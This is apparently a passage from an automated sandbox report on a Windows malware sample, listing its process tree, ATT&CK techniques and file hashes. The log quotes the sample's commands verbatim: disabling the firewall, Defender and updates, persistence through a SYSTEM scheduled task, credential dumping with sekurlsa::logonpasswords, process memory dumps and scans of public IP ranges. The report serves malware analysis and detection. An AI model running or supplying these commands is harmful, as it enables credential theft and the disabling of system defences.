PID:4796
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zsuqqcttl" /ru system /tr "cmd /c C:\Windows\Fonts\etkqeec.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zsuqqcttl" /ru system /tr "cmd /c C:\Windows\Fonts\etkqeec.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4720
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:460
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2008
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4520
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2532
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2892
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2224
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4244
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3056
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- System Location Discovery: System Language Discovery
PID:3088
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3588
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4064
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4088
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:404
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:3992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1544
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:5056
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4716
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
PID:4240 -
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- System Location Discovery: System Language Discovery
PID:4516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:3196 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
PID:1828 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:3512
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
PID:3028 -
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
PID:5020 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
PID:4080
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
PID:2428 -
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
PID:3612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
PID:1144
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:4768 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:4996 -
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:3180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2964
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:3272 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\glztnlvub\rtbetdgqn\wpcap.exe /S2⤵PID:2104
-
C:\Windows\glztnlvub\rtbetdgqn\wpcap.exeC:\Windows\glztnlvub\rtbetdgqn\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:5084 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
PID:1244 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:760
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
PID:1944 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1188
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵PID:1544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:5108
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4772
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3476
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1632
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3728 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1684
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\glztnlvub\rtbetdgqn\ibsgrteit.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ C:\Windows\glztnlvub\rtbetdgqn\Scantest.txt2⤵PID:460
-
C:\Windows\glztnlvub\rtbetdgqn\ibsgrteit.exeC:\Windows\glztnlvub\rtbetdgqn\ibsgrteit.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ C:\Windows\glztnlvub\rtbetdgqn\Scantest.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\glztnlvub\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\glztnlvub\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4992 -
C:\Windows\glztnlvub\Corporate\vfshost.exeC:\Windows\glztnlvub\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
-
C:\Windows\TEMP\amydesk.exeC:\Windows\TEMP\amydesk.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3240
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 440 C:\Windows\TEMP\glztnlvub\440.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 516 C:\Windows\TEMP\glztnlvub\516.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 524 C:\Windows\TEMP\glztnlvub\524.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 656 C:\Windows\TEMP\glztnlvub\656.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 792 C:\Windows\TEMP\glztnlvub\792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 800 C:\Windows\TEMP\glztnlvub\800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:460
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\glztnlvub\rtbetdgqn\scan.bat2⤵
- System Location Discovery: System Language Discovery
PID:1768 -
C:\Windows\glztnlvub\rtbetdgqn\tbsnlrdsp.exetbsnlrdsp.exe TCP 138.199.0.1 138.199.255.255 8080 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1756
-
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 2576 C:\Windows\TEMP\glztnlvub\2576.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5816
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 2756 C:\Windows\TEMP\glztnlvub\2756.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5396
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:6692
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4224
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5184
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:6304
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5584
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5952
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:216
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4192
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5632
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- System Location Discovery: System Language Discovery
PID:6940
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5332
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
PID:6080 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3524
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3576
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:5128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2484
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:6100
-
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 2836 C:\Windows\TEMP\glztnlvub\2836.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 3144 C:\Windows\TEMP\glztnlvub\3144.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6004
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 3276 C:\Windows\TEMP\glztnlvub\3276.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6616
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 3944 C:\Windows\TEMP\glztnlvub\3944.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6240
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 4008 C:\Windows\TEMP\glztnlvub\4008.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4472
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 1056 C:\Windows\TEMP\glztnlvub\1056.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5800
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 2948 C:\Windows\TEMP\glztnlvub\2948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 5012 C:\Windows\TEMP\glztnlvub\5012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:7024
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static delete all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4620
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1188
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4784
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:6548
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4028
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5356
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3524
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3724
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 3928 C:\Windows\TEMP\glztnlvub\3928.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- System Location Discovery: System Language Discovery
PID:6184
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:6508
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5896
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:5612
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1188
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1564
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:5788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5436
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:6568
-
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 3484 C:\Windows\TEMP\glztnlvub\3484.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6812
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 4124 C:\Windows\TEMP\glztnlvub\4124.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\TEMP\glztnlvub\ecalbuvzn.exeC:\Windows\TEMP\glztnlvub\ecalbuvzn.exe -accepteula -mp 4724 C:\Windows\TEMP\glztnlvub\4724.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5996
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\etkqeec.exe1⤵PID:3516
-
C:\Windows\Fonts\etkqeec.exeC:\Windows\Fonts\etkqeec.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2744
-
-
C:\Windows\SysWOW64\iaacws.exeC:\Windows\SysWOW64\iaacws.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4708
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\Fonts\etkqeec.exe1⤵PID:4872
-
C:\Windows\Fonts\etkqeec.exeC:\Windows\Fonts\etkqeec.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5524
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
1Clear Persistence
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
72KB
MD5398fb3fed9be2941f3548a5d0d4b862c
SHA1e9c9e3a4be652de36d1b8cc849c8b3c10e130e2f
SHA256fe345cc8b133d91a3b0bcbf9db4cbc7cc83d1e4f83c297161f83a4bed1ce6a61
SHA5126f406d8d336ead02ff70f9455f070049bb4c923d3d6132381536f5f7e7d67a350b4dea94ad38541be472396fbfe182182f532a51ef37dc491bdbeed477fad29c
-
Filesize
3.9MB
MD559018c6d7b515b0e9841087b780f4003
SHA1556522f5d574873dc607d37566dd120fa6909216
SHA256996c9a40ea5c66245ca1676d415dcd25b41a68f2dd45fb56b0f7fb395c286e07
SHA5123e24f385b3730c7823937e8d83501c8b99416a548533f746a5b8a45dc79634433334ec509eb11e103c7946c11c1c3da2b6aa7ab1234014b12f55867eed5766d6
-
Filesize
2.9MB
MD5e0c143881adf5d320989a1e314a9784e
SHA18e35b0132a8c4e6e0fee31fef5865adfc16dff90
SHA256dd24b1cd0890d6493e2e8025c4f607b256c461002db9de387d7d7d07ab3dca5b
SHA5129271b56c6412269005a602012baa4737f23c4e9bea25fea31d921b1ccb8298d53bd92889ad99f11fec5b5186103de3b40f5d006282bc67506d84fb81daa9e27e
-
Filesize
8.3MB
MD54a670d6740e042c9eed037c51f08e8e7
SHA1909bf509babe8591867bde994542f502366e206b
SHA256f68d1dcaf84c2a3f015546ffd451e5ddab263cb9abf9dab6bb6ecf35bb915ed7
SHA5125470db56bafc4e25a67a2ddbd9f3b7ed32d7bf7e5ce199226d006c00871985cea23e69e5dae2f6eda5fc8dca421128358cdb1b67d95ac39987ff0131ad6bed20
-
Filesize
818KB
MD56d41eb6292304f6f45f9c991d2ac0af5
SHA1e6c6ef1fad3f8efd7a3e380dad9cddee21226826
SHA256cd9a56a2714405d374f83423cb91e9f044a2d6cd47bc97d5bcc3617f706e03d6
SHA5120a5802928c47a09796f49067be7473d4e453702392a6f31bc3515c5fe6402b4984f3182092f4612afbf46144ba2b17bacb4d16df6ad59c309ab7518aeac39afc
-
Filesize
19.9MB
MD5364162816f5e2f4a7114ab0e146f6ce3
SHA1fa12e9b4c36d5786795e7b97f9439ef1dfd96430
SHA256c82057a3620eb24ecdab69a4c74fc250d26c0302992c925c8b7de699309594fa
SHA5129b74f1cb70bf799513cb2078a667c69ecb7238ca3d27606761e0e9b286978dc5cbeb4fee3fa76b99cfe49667178307bf4ecc36d196185c3b205ad2f9f16f9845
-
Filesize
4.6MB
MD536dff324bde042ae3f63de3f38db2581
SHA142d6487f073c58ccd883e128e5810ed986d14dfa
SHA256f080191f13e5a8e76bd2a5a146b72e74faa615a7d7514f2c63655990884fb242
SHA512b2298d8c956d21ebc180b9c5fb6b1278b722fde04a347d7e14da4e2203cb6a3c458b9657dc8aa9d02ea87208b5c78d81180079a1847fa42cdf67c78f1ba73333
-
Filesize
1019KB
MD57e9276a1bae4b09418e9242ddf56bd72
SHA1d87e4b8eef4a835e82ac2edbc44058db7cfd4b03
SHA25687ea23b86f5ae0f6367f36dcab2c32d42673c908faad3bcfe9068f556f2a2907
SHA51248236ea0c14d4392ebe2472bd4d0aad7c1b947936707f41d483e972e531dc72a6215e9b00371c137180771eb8a035fac679feaa2e22cdbb0a5076c8378eb74e8
-
Filesize
2.6MB
MD5713f3477498988b19884fdbfa111353d
SHA1faacb527cc882bb9a71a064831c5dfc693d7aa30
SHA25669a8e11ef5fcdbb1bd61dc7f1096c5b902c6cdf59372b85639adbe3e0e74285c
SHA51208b398a6b7fccbe2b770c0af8c1e6658c715900016487f2fe7cce83f1f9421c7a67bc7d57e473c50fe7678023667c81b5378bb636f36680769d8cd21c9c87fde
-
Filesize
714B
MD57ee64caf54228be5294e542615bcbd9a
SHA1a520fa5cff0dec520231e54d203e512eb3e148f5
SHA2569a19e014fdf05b035dd78c383dd41d2346e95a80e63750e4d7ca73b183b19265
SHA5127ff2fc1cfddbd563978f6d044e60496d22b7fc481e817a0410f98ef9f4335926db6e1bfb3c7ee18f3644aa9f8062a849f5ea0245a7f5cb82193cbdbce09e26bd
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
